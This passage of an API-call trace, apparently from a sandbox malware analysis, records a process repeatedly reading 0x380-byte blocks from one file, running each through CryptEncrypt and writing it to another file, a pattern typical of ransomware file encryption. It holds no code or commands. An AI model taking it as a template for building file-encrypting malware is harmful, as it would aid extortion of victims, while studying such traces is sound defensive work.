lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.169] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.169] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.169] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.169] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.169] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.169] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.169] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.169] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.169] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.169] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.169] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.169] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.170] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.170] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.170] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.170] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.170] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.170] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.170] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.170] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.170] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.170] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.170] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.170] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.170] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.171] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.171] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.171] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.171] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.171] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.171] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.171] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.171] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.171] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.171] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.171] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.171] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.171] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.171] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.172] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.172] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.172] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.172] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.172] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.172] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.172] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.172] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.172] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.172] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.172] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.172] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.172] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.172] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.172] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.173] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.173] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.173] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.173] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.173] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.173] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.173] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.173] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.173] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.173] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.173] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.173] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.173] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.173] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.174] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.174] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.174] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.174] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.174] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.174] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.174] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.174] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.174] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.174] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.174] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.174] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.174] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.174] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.175] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.175] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.175] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.175] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.175] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.175] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.175] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.175] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.175] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.175] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.175] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.175] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.175] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.176] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.176] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, 